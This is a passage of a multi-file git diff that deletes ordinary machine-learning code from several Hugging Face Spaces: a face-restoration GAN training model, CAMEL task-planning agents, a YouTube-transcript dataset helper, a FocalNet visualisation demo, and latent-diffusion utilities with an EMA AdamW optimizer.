loop for batch size - # left eye and right eye - img_inds = self.loc_left_eyes.new_full((2, 1), b) - bbox = torch.stack([self.loc_left_eyes[b, :], self.loc_right_eyes[b, :]], dim=0) # shape: (2, 4) - rois = torch.cat([img_inds, bbox], dim=-1) # shape: (2, 5) - rois_eyes.append(rois) - # mouse - img_inds = self.loc_left_eyes.new_full((1, 1), b) - rois = torch.cat([img_inds, self.loc_mouths[b:b + 1, :]], dim=-1) # shape: (1, 5) - rois_mouths.append(rois) - - rois_eyes = torch.cat(rois_eyes, 0).to(self.device) - rois_mouths = torch.cat(rois_mouths, 0).to(self.device) - - # real images - all_eyes = roi_align(self.gt, boxes=rois_eyes, output_size=eye_out_size) * face_ratio - self.left_eyes_gt = all_eyes[0::2, :, :, :] - self.right_eyes_gt = all_eyes[1::2, :, :, :] - self.mouths_gt = roi_align(self.gt, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio - # output - all_eyes = roi_align(self.output, boxes=rois_eyes, output_size=eye_out_size) * face_ratio - self.left_eyes = all_eyes[0::2, :, :, :] - self.right_eyes = all_eyes[1::2, :, :, :] - self.mouths = roi_align(self.output, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio - - def _gram_mat(self, x): - """Calculate Gram matrix. - - Args: - x (torch.Tensor): Tensor with shape of (n, c, h, w). - - Returns: - torch.Tensor: Gram matrix. - """ - n, c, h, w = x.size() - features = x.view(n, c, w * h) - features_t = features.transpose(1, 2) - gram = features.bmm(features_t) / (c * h * w) - return gram - - def gray_resize_for_identity(self, out, size=128): - out_gray = (0.2989 * out[:, 0, :, :] + 0.5870 * out[:, 1, :, :] + 0.1140 * out[:, 2, :, :]) - out_gray = out_gray.unsqueeze(1) - out_gray = F.interpolate(out_gray, (size, size), mode='bilinear', align_corners=False) - return out_gray - - def optimize_parameters(self, current_iter): - # optimize net_g - for p in self.net_d.parameters(): - p.requires_grad = False - self.optimizer_g.zero_grad() - - # do not update facial component net_d - if self.use_facial_disc: - for p in self.net_d_left_eye.parameters(): - p.requires_grad = False - for p in self.net_d_right_eye.parameters(): - p.requires_grad = False - for p in self.net_d_mouth.parameters(): - p.requires_grad = False - - # image pyramid loss weight - if current_iter < self.opt['train'].get('remove_pyramid_loss', float('inf')): - pyramid_loss_weight = self.opt['train'].get('pyramid_loss_weight', 1) - else: - pyramid_loss_weight = 1e-12 # very small loss - if pyramid_loss_weight > 0: - self.output, out_rgbs = self.net_g(self.lq, return_rgb=True) - pyramid_gt = self.construct_img_pyramid() - else: - self.output, out_rgbs = self.net_g(self.lq, return_rgb=False) - - # get roi-align regions - if self.use_facial_disc: - self.get_roi_regions(eye_out_size=80, mouth_out_size=120) - - l_g_total = 0 - loss_dict = OrderedDict() - if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): - # pixel loss - if self.cri_pix: - l_g_pix = self.cri_pix(self.output, self.gt) - l_g_total += l_g_pix - loss_dict['l_g_pix'] = l_g_pix - - # image pyramid loss - if pyramid_loss_weight > 0: - for i in range(0, self.log_size - 2): - l_pyramid = self.cri_l1(out_rgbs[i], pyramid_gt[i]) * pyramid_loss_weight - l_g_total += l_pyramid - loss_dict[f'l_p_{2**(i+3)}'] = l_pyramid - - # perceptual loss - if self.cri_perceptual: - l_g_percep, l_g_style = self.cri_perceptual(self.output, self.gt) - if l_g_percep is not None: - l_g_total += l_g_percep - loss_dict['l_g_percep'] = l_g_percep - if l_g_style is not None: - l_g_total += l_g_style - 
loss_dict['l_g_style'] = l_g_style - - # gan loss - fake_g_pred = self.net_d(self.output) - l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan'] = l_g_gan - - # facial component loss - if self.use_facial_disc: - # left eye - fake_left_eye, fake_left_eye_feats = self.net_d_left_eye(self.left_eyes, return_feats=True) - l_g_gan = self.cri_component(fake_left_eye, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan_left_eye'] = l_g_gan - # right eye - fake_right_eye, fake_right_eye_feats = self.net_d_right_eye(self.right_eyes, return_feats=True) - l_g_gan = self.cri_component(fake_right_eye, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan_right_eye'] = l_g_gan - # mouth - fake_mouth, fake_mouth_feats = self.net_d_mouth(self.mouths, return_feats=True) - l_g_gan = self.cri_component(fake_mouth, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan_mouth'] = l_g_gan - - if self.opt['train'].get('comp_style_weight', 0) > 0: - # get gt feat - _, real_left_eye_feats = self.net_d_left_eye(self.left_eyes_gt, return_feats=True) - _, real_right_eye_feats = self.net_d_right_eye(self.right_eyes_gt, return_feats=True) - _, real_mouth_feats = self.net_d_mouth(self.mouths_gt, return_feats=True) - - def _comp_style(feat, feat_gt, criterion): - return criterion(self._gram_mat(feat[0]), self._gram_mat( - feat_gt[0].detach())) * 0.5 + criterion( - self._gram_mat(feat[1]), self._gram_mat(feat_gt[1].detach())) - - # facial component style loss - comp_style_loss = 0 - comp_style_loss += _comp_style(fake_left_eye_feats, real_left_eye_feats, self.cri_l1) - comp_style_loss += _comp_style(fake_right_eye_feats, real_right_eye_feats, self.cri_l1) - comp_style_loss += _comp_style(fake_mouth_feats, real_mouth_feats, self.cri_l1) - comp_style_loss = comp_style_loss * self.opt['train']['comp_style_weight'] - l_g_total += comp_style_loss - loss_dict['l_g_comp_style_loss'] = comp_style_loss - - # identity loss - if self.use_identity: - identity_weight = self.opt['train']['identity_weight'] - # get gray images and resize - out_gray = self.gray_resize_for_identity(self.output) - gt_gray = self.gray_resize_for_identity(self.gt) - - identity_gt = self.network_identity(gt_gray).detach() - identity_out = self.network_identity(out_gray) - l_identity = self.cri_l1(identity_out, identity_gt) * identity_weight - l_g_total += l_identity - loss_dict['l_identity'] = l_identity - - l_g_total.backward() - self.optimizer_g.step() - - # EMA - self.model_ema(decay=0.5**(32 / (10 * 1000))) - - # ----------- optimize net_d ----------- # - for p in self.net_d.parameters(): - p.requires_grad = True - self.optimizer_d.zero_grad() - if self.use_facial_disc: - for p in self.net_d_left_eye.parameters(): - p.requires_grad = True - for p in self.net_d_right_eye.parameters(): - p.requires_grad = True - for p in self.net_d_mouth.parameters(): - p.requires_grad = True - self.optimizer_d_left_eye.zero_grad() - self.optimizer_d_right_eye.zero_grad() - self.optimizer_d_mouth.zero_grad() - - fake_d_pred = self.net_d(self.output.detach()) - real_d_pred = self.net_d(self.gt) - l_d = self.cri_gan(real_d_pred, True, is_disc=True) + self.cri_gan(fake_d_pred, False, is_disc=True) - loss_dict['l_d'] = l_d - # In WGAN, real_score should be positive and fake_score should be negative - loss_dict['real_score'] = real_d_pred.detach().mean() - loss_dict['fake_score'] = fake_d_pred.detach().mean() - l_d.backward() - - # regularization loss - if current_iter % self.net_d_reg_every == 0: 
- self.gt.requires_grad = True - real_pred = self.net_d(self.gt) - l_d_r1 = r1_penalty(real_pred, self.gt) - l_d_r1 = (self.r1_reg_weight / 2 * l_d_r1 * self.net_d_reg_every + 0 * real_pred[0]) - loss_dict['l_d_r1'] = l_d_r1.detach().mean() - l_d_r1.backward() - - self.optimizer_d.step() - - # optimize facial component discriminators - if self.use_facial_disc: - # left eye - fake_d_pred, _ = self.net_d_left_eye(self.left_eyes.detach()) - real_d_pred, _ = self.net_d_left_eye(self.left_eyes_gt) - l_d_left_eye = self.cri_component( - real_d_pred, True, is_disc=True) + self.cri_gan( - fake_d_pred, False, is_disc=True) - loss_dict['l_d_left_eye'] = l_d_left_eye - l_d_left_eye.backward() - # right eye - fake_d_pred, _ = self.net_d_right_eye(self.right_eyes.detach()) - real_d_pred, _ = self.net_d_right_eye(self.right_eyes_gt) - l_d_right_eye = self.cri_component( - real_d_pred, True, is_disc=True) + self.cri_gan( - fake_d_pred, False, is_disc=True) - loss_dict['l_d_right_eye'] = l_d_right_eye - l_d_right_eye.backward() - # mouth - fake_d_pred, _ = self.net_d_mouth(self.mouths.detach()) - real_d_pred, _ = self.net_d_mouth(self.mouths_gt) - l_d_mouth = self.cri_component( - real_d_pred, True, is_disc=True) + self.cri_gan( - fake_d_pred, False, is_disc=True) - loss_dict['l_d_mouth'] = l_d_mouth - l_d_mouth.backward() - - self.optimizer_d_left_eye.step() - self.optimizer_d_right_eye.step() - self.optimizer_d_mouth.step() - - self.log_dict = self.reduce_loss_dict(loss_dict) - - def test(self): - with torch.no_grad(): - if hasattr(self, 'net_g_ema'): - self.net_g_ema.eval() - self.output, _ = self.net_g_ema(self.lq) - else: - logger = get_root_logger() - logger.warning('Do not have self.net_g_ema, use self.net_g.') - self.net_g.eval() - self.output, _ = self.net_g(self.lq) - self.net_g.train() - - def dist_validation(self, dataloader, current_iter, tb_logger, save_img): - if self.opt['rank'] == 0: - self.nondist_validation(dataloader, current_iter, tb_logger, save_img) - - def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): - dataset_name = dataloader.dataset.opt['name'] - with_metrics = self.opt['val'].get('metrics') is not None - use_pbar = self.opt['val'].get('pbar', False) - - if with_metrics: - if not hasattr(self, 'metric_results'): # only execute in the first run - self.metric_results = {metric: 0 for metric in self.opt['val']['metrics'].keys()} - # initialize the best metric results for each dataset_name (supporting multiple validation datasets) - self._initialize_best_metric_results(dataset_name) - # zero self.metric_results - self.metric_results = {metric: 0 for metric in self.metric_results} - - metric_data = dict() - if use_pbar: - pbar = tqdm(total=len(dataloader), unit='image') - - for idx, val_data in enumerate(dataloader): - img_name = osp.splitext(osp.basename(val_data['lq_path'][0]))[0] - self.feed_data(val_data) - self.test() - - sr_img = tensor2img(self.output.detach().cpu(), min_max=(-1, 1)) - metric_data['img'] = sr_img - if hasattr(self, 'gt'): - gt_img = tensor2img(self.gt.detach().cpu(), min_max=(-1, 1)) - metric_data['img2'] = gt_img - del self.gt - - # tentative for out of GPU memory - del self.lq - del self.output - torch.cuda.empty_cache() - - if save_img: - if self.opt['is_train']: - save_img_path = osp.join(self.opt['path']['visualization'], img_name, - f'{img_name}_{current_iter}.png') - else: - if self.opt['val']['suffix']: - save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, - 
f'{img_name}_{self.opt["val"]["suffix"]}.png') - else: - save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, - f'{img_name}_{self.opt["name"]}.png') - imwrite(sr_img, save_img_path) - - if with_metrics: - # calculate metrics - for name, opt_ in self.opt['val']['metrics'].items(): - self.metric_results[name] += calculate_metric(metric_data, opt_) - if use_pbar: - pbar.update(1) - pbar.set_description(f'Test {img_name}') - if use_pbar: - pbar.close() - - if with_metrics: - for metric in self.metric_results.keys(): - self.metric_results[metric] /= (idx + 1) - # update the best metric result - self._update_best_metric_result(dataset_name, metric, self.metric_results[metric], current_iter) - - self._log_validation_metric_values(current_iter, dataset_name, tb_logger) - - def _log_validation_metric_values(self, current_iter, dataset_name, tb_logger): - log_str = f'Validation {dataset_name}\n' - for metric, value in self.metric_results.items(): - log_str += f'\t # {metric}: {value:.4f}' - if hasattr(self, 'best_metric_results'): - log_str += (f'\tBest: {self.best_metric_results[dataset_name][metric]["val"]:.4f} @ ' - f'{self.best_metric_results[dataset_name][metric]["iter"]} iter') - log_str += '\n' - - logger = get_root_logger() - logger.info(log_str) - if tb_logger: - for metric, value in self.metric_results.items(): - tb_logger.add_scalar(f'metrics/{dataset_name}/{metric}', value, current_iter) - - def save(self, epoch, current_iter): - # save net_g and net_d - self.save_network([self.net_g, self.net_g_ema], 'net_g', current_iter, param_key=['params', 'params_ema']) - self.save_network(self.net_d, 'net_d', current_iter) - # save component discriminators - if self.use_facial_disc: - self.save_network(self.net_d_left_eye, 'net_d_left_eye', current_iter) - self.save_network(self.net_d_right_eye, 'net_d_right_eye', current_iter) - self.save_network(self.net_d_mouth, 'net_d_mouth', current_iter) - # save training state - self.save_training_state(epoch, current_iter) diff --git a/spaces/jskalbg/ChatDev01/camel/agents/task_agent.py b/spaces/jskalbg/ChatDev01/camel/agents/task_agent.py deleted file mode 100644 index 20320cfa9a10610d8f5b77af5c523440925ed3b9..0000000000000000000000000000000000000000 --- a/spaces/jskalbg/ChatDev01/camel/agents/task_agent.py +++ /dev/null @@ -1,171 +0,0 @@ -# =========== Copyright 2023 @ CAMEL-AI.org. All Rights Reserved. =========== -# Licensed under the Apache License, Version 2.0 (the “License”); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an “AS IS” BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# =========== Copyright 2023 @ CAMEL-AI.org. All Rights Reserved. =========== -from typing import Any, Dict, Optional, Union - -from camel.agents import ChatAgent -from camel.configs import ChatGPTConfig -from camel.messages import SystemMessage, UserChatMessage -from camel.prompts import PromptTemplateGenerator, TextPrompt -from camel.typing import ModelType, RoleType, TaskType - - -class TaskSpecifyAgent(ChatAgent): - r"""An agent that Specifies a given task prompt by prompting the user to - provide more details. 
- - Attributes: - DEFAULT_WORD_LIMIT (int): The default word limit for the task prompt. - task_specify_prompt (TextPrompt): The prompt for specifying the task. - - Args: - model (ModelType): The type of model to use for the agent. - (default: :obj:`ModelType.GPT_3_5_TURBO`) - task_type (TaskType): The type of task for which to generate a prompt. - (default: :obj:`TaskType.AI_SOCIETY`) - model_config (Any): The configuration for the model. - (default: :obj:`None`) - task_specify_prompt (Optional[TextPrompt]): The prompt for specifying - the task. (default: :obj:`None`) - word_limit (int): The word limit for the task prompt. - (default: :obj:`50`) - """ - DEFAULT_WORD_LIMIT = 50 - - def __init__( - self, - model: Optional[ModelType] = None, - task_type: TaskType = TaskType.AI_SOCIETY, - model_config: Optional[Any] = None, - task_specify_prompt: Optional[Union[str, TextPrompt]] = None, - word_limit: int = DEFAULT_WORD_LIMIT, - ) -> None: - - if task_specify_prompt is None: - task_specify_prompt_template = PromptTemplateGenerator( - ).get_task_specify_prompt(task_type) - - self.task_specify_prompt = task_specify_prompt_template.format( - word_limit=word_limit) - else: - self.task_specify_prompt = task_specify_prompt - - model_config = model_config or ChatGPTConfig(temperature=1.0) - - system_message = SystemMessage( - role_name="Task Specifier", - role_type=RoleType.ASSISTANT, - content="You can make a task more specific.", - ) - super().__init__(system_message, model, model_config) - - def step( - self, - original_task_prompt: Union[str, TextPrompt], - meta_dict: Optional[Dict[str, Any]] = None, - ) -> TextPrompt: - r"""Specify the given task prompt by providing more details. - - Args: - original_task_prompt (Union[str, TextPrompt]): The original task - prompt. - meta_dict (Optional[Dict[str, Any]]): A dictionary containing - additional information to include in the prompt. - (default: :obj:`None`) - - Returns: - TextPrompt: The specified task prompt. - """ - self.reset() - self.task_specify_prompt = self.task_specify_prompt.format( - task=original_task_prompt) - - if meta_dict is not None: - self.task_specify_prompt = (self.task_specify_prompt.format( - **meta_dict)) - - task_msg = UserChatMessage(role_name="Task Specifier", - content=self.task_specify_prompt) - specifier_response = super().step(task_msg) - if (specifier_response.msgs is None - or len(specifier_response.msgs) == 0): - raise RuntimeError("Task specification failed.") - specified_task_msg = specifier_response.msgs[0] - - if specifier_response.terminated: - raise RuntimeError("Task specification failed.") - - return TextPrompt(specified_task_msg.content) - - -class TaskPlannerAgent(ChatAgent): - r"""An agent that helps divide a task into subtasks based on the input - task prompt. - - Attributes: - task_planner_prompt (TextPrompt): A prompt for the agent to divide - the task into subtasks. - - Args: - model (ModelType): The type of model to use for the agent. - (default: :obj:`ModelType.GPT_3_5_TURBO`) - model_config (Any): The configuration for the model. - (default: :obj:`None`) - """ - - def __init__( - self, - model: Optional[ModelType] = None, - model_config: Any = None, - ) -> None: - - self.task_planner_prompt = TextPrompt( - "Divide this task into subtasks: {task}. 
Be concise.") - - system_message = SystemMessage( - role_name="Task Planner", - role_type=RoleType.ASSISTANT, - content="You are a helpful task planner.", - ) - super().__init__(system_message, model, model_config) - - def step( - self, - task_prompt: Union[str, TextPrompt], - ) -> TextPrompt: - r"""Generate subtasks based on the input task prompt. - - Args: - task_prompt (Union[str, TextPrompt]): The prompt for the task to - be divided into subtasks. - - Returns: - TextPrompt: A prompt for the subtasks generated by the agent. - """ - # TODO: Maybe include roles information. - self.reset() - self.task_planner_prompt = self.task_planner_prompt.format( - task=task_prompt) - - task_msg = UserChatMessage(role_name="Task Planner", - content=self.task_planner_prompt) - # sub_tasks_msgs, terminated, _ - task_tesponse = super().step(task_msg) - - if task_tesponse.msgs is None: - raise RuntimeError("Got None Subtasks messages.") - if task_tesponse.terminated: - raise RuntimeError("Task planning failed.") - - sub_tasks_msg = task_tesponse.msgs[0] - return TextPrompt(sub_tasks_msg.content) diff --git a/spaces/juancopi81/whisper-youtube-2-hf_dataset/dataset/hf_dataset.py b/spaces/juancopi81/whisper-youtube-2-hf_dataset/dataset/hf_dataset.py deleted file mode 100644 index 11270df2a215c3144ed58b836fa06c7edb53604a..0000000000000000000000000000000000000000 --- a/spaces/juancopi81/whisper-youtube-2-hf_dataset/dataset/hf_dataset.py +++ /dev/null @@ -1,48 +0,0 @@ -# Adapted from Eduardo Matallanas -from datasets import load_dataset, Dataset -from datasets.data_files import EmptyDatasetError - -class HFDataset(): - """ - Create a dataset to save the transcripts from Youtube. - """ - def __init__(self, name) -> None: - self.name = name - if name != "": - self._init_dataset() - else: - self.dataset = Dataset.from_dict({}) - self.exist = False - self.is_empty = True - - def _init_dataset(self): - try: - self.dataset = load_dataset(self.name) - self.exist = True - self.is_empty = False - self.list_of_ids = self._get_list_of_id() - except EmptyDatasetError: - self.dataset = Dataset.from_dict({}) - self.exist = True - self.is_empty = True - self.list_of_ids = [] - pass - except FileNotFoundError: - self.dataset = Dataset.from_dict({}) - self.exist = False - self.is_empty = True - self.list_of_ids = [] - pass - - def upload(self): - self.dataset.push_to_hub(self.name) - - def _get_list_of_id(self): - new_ds = self.dataset.map( - lambda x: {"ID": [url.split("=")[-1] for url in x["URL"]]}, batched=True - ) - list_of_ids = [] - for split in new_ds: - ids = new_ds[split]["ID"] - list_of_ids.append(ids) - return [item for sublist in list_of_ids for item in sublist] \ No newline at end of file diff --git a/spaces/jw2yang/focalnet-modulators/app.py b/spaces/jw2yang/focalnet-modulators/app.py deleted file mode 100644 index a7afb40af6c11d86f3b59c1567cdfc240aa32a82..0000000000000000000000000000000000000000 --- a/spaces/jw2yang/focalnet-modulators/app.py +++ /dev/null @@ -1,128 +0,0 @@ -import requests -import gradio as gr -import numpy as np -import cv2 -import torch -import torch.nn as nn -from PIL import Image -from torchvision import transforms -from timm.data.constants import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD -from timm.data import create_transform -from focalnet import FocalNet, build_transforms, build_transforms4display - -# Download human-readable labels for ImageNet. 
-response = requests.get("https://git.io/JJkYN") -labels = response.text.split("\n") - -''' -build model -''' -model = FocalNet(depths=[12], patch_size=16, embed_dim=768, focal_levels=[3], use_layerscale=True, use_postln=True) -# url = 'https://projects4jw.blob.core.windows.net/focalnet/release/classification/focalnet_base_iso_16.pth' -# checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu", check_hash=True) -checkpoint = torch.load("./focalnet_base_iso_16.pth", map_location="cpu") -model.load_state_dict(checkpoint["model"]) -model.eval() - -''' -build data transform -''' -eval_transforms = build_transforms(224, center_crop=False) -display_transforms = build_transforms4display(224, center_crop=False) - -''' -build upsampler -''' -# upsampler = nn.Upsample(scale_factor=16, mode='bilinear') - -''' -borrow code from here: https://github.com/jacobgil/pytorch-grad-cam/blob/master/pytorch_grad_cam/utils/image.py -''' -def show_cam_on_image(img: np.ndarray, - mask: np.ndarray, - use_rgb: bool = False, - colormap: int = cv2.COLORMAP_JET) -> np.ndarray: - """ This function overlays the cam mask on the image as an heatmap. - By default the heatmap is in BGR format. - :param img: The base image in RGB or BGR format. - :param mask: The cam mask. - :param use_rgb: Whether to use an RGB or BGR heatmap, this should be set to True if 'img' is in RGB format. - :param colormap: The OpenCV colormap to be used. - :returns: The default image with the cam overlay. - """ - heatmap = cv2.applyColorMap(np.uint8(255 * mask), colormap) - if use_rgb: - heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB) - heatmap = np.float32(heatmap) / 255 - - if np.max(img) > 1: - raise Exception( - "The input image should np.float32 in the range [0, 1]") - - cam = 0.5*heatmap + 0.5*img - # cam = heatmap - # cam = cam / np.max(cam) - return np.uint8(255 * cam) - -def classify_image(inp): - - img_t = eval_transforms(inp) - img_d = display_transforms(inp).permute(1, 2, 0).numpy() - print(img_d.min(), img_d.max()) - - prediction = model(img_t.unsqueeze(0)).softmax(-1).flatten() - - modulator = model.layers[0].blocks[11].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam0 = show_cam_on_image(img_d, modulator, use_rgb=True) - - modulator = model.layers[0].blocks[8].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam1 = show_cam_on_image(img_d, modulator, use_rgb=True) - - modulator = model.layers[0].blocks[5].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam2 = show_cam_on_image(img_d, modulator, use_rgb=True) - - modulator = model.layers[0].blocks[2].modulation.modulator.norm(2, 1, keepdim=True) - modulator = nn.Upsample(size=img_t.shape[1:], mode='bilinear')(modulator) - modulator = modulator.squeeze(1).detach().permute(1, 2, 0).numpy() - modulator = (modulator - modulator.min()) / (modulator.max() - modulator.min()) - cam3 = 
show_cam_on_image(img_d, modulator, use_rgb=True) - - return {labels[i]: float(prediction[i]) for i in range(1000)}, Image.fromarray(cam0), Image.fromarray(cam1), Image.fromarray(cam2), Image.fromarray(cam3), Image.fromarray(np.uint8(255 * img_d)) - - -image = gr.inputs.Image() -label = gr.outputs.Label(num_top_classes=3) - -gr.Interface( - description="Image classification and visualizations with FocalNet (https://github.com/microsoft/FocalNet)", - fn=classify_image, - inputs=image, - outputs=[ - label, - gr.outputs.Image( - type="pil", - label="Modulator at layer 12"), - gr.outputs.Image( - type="pil", - label="Modulator at layer 9"), - gr.outputs.Image( - type="pil", - label="Modulator at layer 6"), - gr.outputs.Image( - type="pil", - label="Modulator at layer 3"), - gr.outputs.Image( - type="pil", - label="Cropped Input"), - ], - examples=[["./donut.png"], ["./horses.png"], ["./pencil.png"], ["./ILSVRC2012_val_00031987.JPEG"]], -).launch() diff --git a/spaces/jyseo/3DFuse/ldm/util.py b/spaces/jyseo/3DFuse/ldm/util.py deleted file mode 100644 index 8c09ca1c72f7ceb3f9d7f9546aae5561baf62b13..0000000000000000000000000000000000000000 --- a/spaces/jyseo/3DFuse/ldm/util.py +++ /dev/null @@ -1,197 +0,0 @@ -import importlib - -import torch -from torch import optim -import numpy as np - -from inspect import isfunction -from PIL import Image, ImageDraw, ImageFont - - -def log_txt_as_img(wh, xc, size=10): - # wh a tuple of (width, height) - # xc a list of captions to plot - b = len(xc) - txts = list() - for bi in range(b): - txt = Image.new("RGB", wh, color="white") - draw = ImageDraw.Draw(txt) - font = ImageFont.truetype('data/DejaVuSans.ttf', size=size) - nc = int(40 * (wh[0] / 256)) - lines = "\n".join(xc[bi][start:start + nc] for start in range(0, len(xc[bi]), nc)) - - try: - draw.text((0, 0), lines, fill="black", font=font) - except UnicodeEncodeError: - print("Cant encode string for logging. Skipping.") - - txt = np.array(txt).transpose(2, 0, 1) / 127.5 - 1.0 - txts.append(txt) - txts = np.stack(txts) - txts = torch.tensor(txts) - return txts - - -def ismap(x): - if not isinstance(x, torch.Tensor): - return False - return (len(x.shape) == 4) and (x.shape[1] > 3) - - -def isimage(x): - if not isinstance(x,torch.Tensor): - return False - return (len(x.shape) == 4) and (x.shape[1] == 3 or x.shape[1] == 1) - - -def exists(x): - return x is not None - - -def default(val, d): - if exists(val): - return val - return d() if isfunction(d) else d - - -def mean_flat(tensor): - """ - https://github.com/openai/guided-diffusion/blob/27c20a8fab9cb472df5d6bdd6c8d11c8f430b924/guided_diffusion/nn.py#L86 - Take the mean over all non-batch dimensions. 
- """ - return tensor.mean(dim=list(range(1, len(tensor.shape)))) - - -def count_params(model, verbose=False): - total_params = sum(p.numel() for p in model.parameters()) - if verbose: - print(f"{model.__class__.__name__} has {total_params*1.e-6:.2f} M params.") - return total_params - - -def instantiate_from_config(config): - if not "target" in config: - if config == '__is_first_stage__': - return None - elif config == "__is_unconditional__": - return None - raise KeyError("Expected key `target` to instantiate.") - return get_obj_from_str(config["target"])(**config.get("params", dict())) - - -def get_obj_from_str(string, reload=False): - module, cls = string.rsplit(".", 1) - if reload: - module_imp = importlib.import_module(module) - importlib.reload(module_imp) - return getattr(importlib.import_module(module, package=None), cls) - - -class AdamWwithEMAandWings(optim.Optimizer): - # credit to https://gist.github.com/crowsonkb/65f7265353f403714fce3b2595e0b298 - def __init__(self, params, lr=1.e-3, betas=(0.9, 0.999), eps=1.e-8, # TODO: check hyperparameters before using - weight_decay=1.e-2, amsgrad=False, ema_decay=0.9999, # ema decay to match previous code - ema_power=1., param_names=()): - """AdamW that saves EMA versions of the parameters.""" - if not 0.0 <= lr: - raise ValueError("Invalid learning rate: {}".format(lr)) - if not 0.0 <= eps: - raise ValueError("Invalid epsilon value: {}".format(eps)) - if not 0.0 <= betas[0] < 1.0: - raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0])) - if not 0.0 <= betas[1] < 1.0: - raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1])) - if not 0.0 <= weight_decay: - raise ValueError("Invalid weight_decay value: {}".format(weight_decay)) - if not 0.0 <= ema_decay <= 1.0: - raise ValueError("Invalid ema_decay value: {}".format(ema_decay)) - defaults = dict(lr=lr, betas=betas, eps=eps, - weight_decay=weight_decay, amsgrad=amsgrad, ema_decay=ema_decay, - ema_power=ema_power, param_names=param_names) - super().__init__(params, defaults) - - def __setstate__(self, state): - super().__setstate__(state) - for group in self.param_groups: - group.setdefault('amsgrad', False) - - @torch.no_grad() - def step(self, closure=None): - """Performs a single optimization step. - Args: - closure (callable, optional): A closure that reevaluates the model - and returns the loss. - """ - loss = None - if closure is not None: - with torch.enable_grad(): - loss = closure() - - for group in self.param_groups: - params_with_grad = [] - grads = [] - exp_avgs = [] - exp_avg_sqs = [] - ema_params_with_grad = [] - state_sums = [] - max_exp_avg_sqs = [] - state_steps = [] - amsgrad = group['amsgrad'] - beta1, beta2 = group['betas'] - ema_decay = group['ema_decay'] - ema_power = group['ema_power'] - - for p in group['params']: - if p.grad is None: - continue - params_with_grad.append(p) - if p.grad.is_sparse: - raise RuntimeError('AdamW does not support sparse gradients') - grads.append(p.grad) - - state = self.state[p] - - # State initialization - if len(state) == 0: - state['step'] = 0 - # Exponential moving average of gradient values - state['exp_avg'] = torch.zeros_like(p, memory_format=torch.preserve_format) - # Exponential moving average of squared gradient values - state['exp_avg_sq'] = torch.zeros_like(p, memory_format=torch.preserve_format) - if amsgrad: - # Maintains max of all exp. moving avg. of sq. grad. 
values - state['max_exp_avg_sq'] = torch.zeros_like(p, memory_format=torch.preserve_format) - # Exponential moving average of parameter values - state['param_exp_avg'] = p.detach().float().clone() - - exp_avgs.append(state['exp_avg']) - exp_avg_sqs.append(state['exp_avg_sq']) - ema_params_with_grad.append(state['param_exp_avg']) - - if amsgrad: - max_exp_avg_sqs.append(state['max_exp_avg_sq']) - - # update the steps for each param group update - state['step'] += 1 - # record the step after step update - state_steps.append(state['step']) - - optim._functional.adamw(params_with_grad, - grads, - exp_avgs, - exp_avg_sqs, - max_exp_avg_sqs, - state_steps, - amsgrad=amsgrad, - beta1=beta1, - beta2=beta2, - lr=group['lr'], - weight_decay=group['weight_decay'], - eps=group['eps'], - maximize=False) - - cur_ema_decay = min(ema_decay, 1 - state['step'] ** -ema_power) - for param, ema_param in zip(params_with_grad, ema_params_with_grad): - ema_param.mul_(cur_ema_decay).add_(param.float(), alpha=1 - cur_ema_decay) - - return loss \ No newline at end of file diff --git a/spaces/kaicheng/ChatGPT_ad/assets/external-scripts.js b/spaces/kaicheng/ChatGPT_ad/assets/external-scripts.js deleted file mode 100644 index 8d0352669045537af5698b1824dbc1dba21df478..0000000000000000000000000000000000000000 --- a/spaces/kaicheng/ChatGPT_ad/assets/external-scripts.js +++ /dev/null @@ -1,2 +0,0 @@ - -// external javascript here diff --git a/spaces/kevinwang676/Bert-VITS2/mel_processing.py b/spaces/kevinwang676/Bert-VITS2/mel_processing.py deleted file mode 100644 index 50435ecf88ef4fb6c1d47f3e6edd04c3ea7d3e80..0000000000000000000000000000000000000000 --- a/spaces/kevinwang676/Bert-VITS2/mel_processing.py +++ /dev/null @@ -1,112 +0,0 @@ -import math -import os -import random -import torch -from torch import nn -import torch.nn.functional as F -import torch.utils.data -import numpy as np -import librosa -import librosa.util as librosa_util -from librosa.util import normalize, pad_center, tiny -from scipy.signal import get_window -from scipy.io.wavfile import read -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return 